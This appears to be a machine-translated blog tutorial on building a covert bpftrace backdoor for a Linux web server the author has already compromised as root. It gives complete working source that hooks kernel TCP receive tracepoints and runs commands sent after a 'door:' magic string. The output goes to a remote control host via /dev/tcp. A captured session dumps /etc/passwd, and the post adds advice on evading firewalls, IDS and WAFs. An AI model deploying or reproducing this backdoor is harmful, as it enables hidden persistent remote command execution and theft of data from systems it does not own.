I. Introduction
In fact, I have never used other backdoor programs. I remember that some attack tools on the Kali system automatically bounce back to the shell, and use the shell to connect remotely. Others use nc, which is relatively simple.
What is the back door, I think it is to leave a convenient passage for myself to enter and exit. I have already taken down this machine, but I moved too much and was discovered. After cleaning it up, the results are gone, so I have to keep it a secret. It is a convenient channel to prevent the loss of the connection that has been reused, and it will be too late to regret it.
So what is a good backdoor? I think a good backdoor should occupy as little resources as possible to prevent being discovered. Some mining trojans take up hundreds of percent of the cpu right away. Don’t you think your leaks are not obvious enough? The second is to be low-key, low-key No matter how low-key it is, those who can not open the port will not open the port, and open a service port, then the action will be relatively large. Those who can use the existing environment can not make changes to the environment, so that they can be hidden longer.
The small backdoor played with bpftrace this time is actually just an experiment, very rough, but I think it is a very good idea, with a slightly improved function, it may not be impossible to play with.
Since it is a backdoor, I think the first thing to do is to take down this machine with root privileges. The bpftrace used by the backdoor this time requires root privileges to run.
If you don't know enough about bpftrace, read the previous article, the magical BPF4, which also writes about the back door, but I think it is not clear enough, so I have this article.
Hereby declare, don't do bad things, or you will bear the consequences!
2 Deployment and principle description
I tested it in a virtual machine environment, the above are two virtual machines, the ip is as above. Host 50 is a web server, and our bpftrace backdoor is built on this machine. The whole process is as follows:
First, the control machine connects to port 80 as an ordinary client, and then sends some special commands.
The backdoor program written by bpftrace is inserted into some methods of receiving messages of the kernel's tcp.
After the backdoor program takes out the program, it executes the program, and the message is normally sent to the web background.
The backdoor program sends the result of command execution to a specific port on the control machine.
Three command execution
The controlled machine executes the start command:
#启动bpftrace后门
./backdoor.btThe control machine starts:
# 利用nc启动个监听服务器
nc -lk 10000
#再开个终端执行命令:
nc -4 -v 192.168.31.50 80
#输入后门魔术字符,后面跟着要执行的命令,比如cat /etc/passwd
# 会在监听端口收到命令的返回结果的。
door: cat /etc/passwdThe connection command diagram is as follows:
root@ubuntu-lab:/home/miao/bpftrace-test# nc -4 -v 192.168.31.50 80
Connection to 192.168.31.50 80 port [tcp/http] succeeded!
door: ls /
HTTP/1.1 400 Bad Request
Server: nginx/1.14.1
Date: Sat, 18 Jun 2022 13:43:15 GMT
Content-Type: text/html
Content-Length: 173
Connection: close
<html>
<head><title>400 Bad Request</title></head>
<body bgcolor="white">
<center><h1>400 Bad Request</h1></center>
<hr><center>nginx/1.14.1</center>
</body>
</html>Return the result map:
root@ubuntu-lab:/home/miao# nc -lk 10000
execute cmd: cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
....Four source code
The source code is very simple, as follows,
#!/usr/bin/bpftrace --unsafe
#include <net/sock.h>
#include <linux/in.h>
#include <linux/in6.h>
BEGIN
{
printf("Welcome to Offensive BPF... Use Ctrl-C to exit.\n");
}
tracepoint:syscalls:sys_enter_accept*
{
@sk[tid] = args->upeer_sockaddr;
}
tracepoint:syscalls:sys_exit_accept*
/ @sk[tid] /
{
@sys_accepted[tid] = @sk[tid];
$sa = (struct sockaddr *) @sk[tid];
if ($sa->sa_family == AF_INET) {
$s = (struct sockaddr_in *) @sk[tid];
$port = ($s->sin_port>>8) | (($s->sin_port<<8) &0xff00);
printf("%-16s %-5d \n",ntop(AF_INET,$s->sin_addr.s_addr),$port);
}
}
tracepoint:syscalls:sys_enter_recvfrom
/ @sys_accepted[tid] /
{
@fds[tid]=args->fd;
@sys_read[tid] = args->ubuf;
}
tracepoint:syscalls:sys_exit_recvfrom
{
$len = args->ret;
if ((@sys_read[tid] != 0) && ($len > 5))
{
$cmd = str(@sys_read[tid], 5);
if ($cmd == "door:")
{
$cmd=str(@sys_read[tid]+5,$len-5-1);
printf("************tid:%d Command: %s***********\n", tid, $cmd);
@cmds[tid]=$cmd;
@exec[tid] = 1;
system("echo %s >/dev/tcp/192.168.31.200/10000",$cmd);
} else {
printf("recv:%s\n",str(@sys_read[tid]));
}
}
}
tracepoint:syscalls:sys_enter_writev,tracepoint:syscalls:sys_enter_write
/ @exec[tid] == 1 /
{
printf("write to client:");
printf("%d %d",args->fd,@fds[tid]);
system("%s >/dev/tcp/192.168.31.200/10000",@cmds[tid]);
}
END
{
clear(@cmds);
clear(@fds);
clear(@exec);
clear(@sk);
clear(@sys_read);
clear(@sys_accepted);
printf("Exiting. Bye.\n");
}In the magical BPF4 article, it has already been explained, and here is a brief introduction to the tcp key sending and receiving message function of the stub kernel to determine whether the received character is a magic string. If it is intercepted, execute the command, and then pass The tcp protocol is sent to the control terminal.
Five advantages and disadvantages and improvements
advantage:
First of all, the backdoor written by bpftrace is very simple.
The back door does not need to open a new port, as long as the port of the tcp service is opened, it can be used, but some of them are not easy to use. Of course, it can also be changed to use the udp port. In short, it can be used flexibly according to the server situation.
For the firewall, it is a normal http request. The only possible problem is sending a magic string. The traffic detection device may give an alarm, but if you look at the returned information is normal, you may think that the attack was not successful.
By means of external sending, the connection is disconnected after sending the message, which is difficult to find.
Disadvantages and Improvements
The magic string in the current script is a shortcoming. If you look carefully, you may find it. Then if the backdoor is behind the https port, pass it through the parameters behind the url, and add encoding. The ids device cannot be found, and the waf may also see it. If it doesn't come out, it's an attack.
In fact, there is a better way, that is, instead of passing messages through magic strings, fix several commands in the back, and then execute specific commands by judging the port of the client, and the execution results will not be returned to the control end at all, for example, we When connecting to the web server through port 2345, execute the command to add a test user, whether it is through the flow detection device, firewall device, waf device, there is no way to detect it, unless you check the bpf program on the host, you can see it, really Pretty interesting, isn't it.
6 How to detect that
For this, refer to the article on the magical BPF4.
Seven Reference Connections and Learning Connections
[https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace-message-based/](https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace-message-based/)
[https://www.brendangregg.com/bpf-performance-tools-book.html#ebook](https://www.brendangregg.com/bpf-performance-tools-book.html#ebook)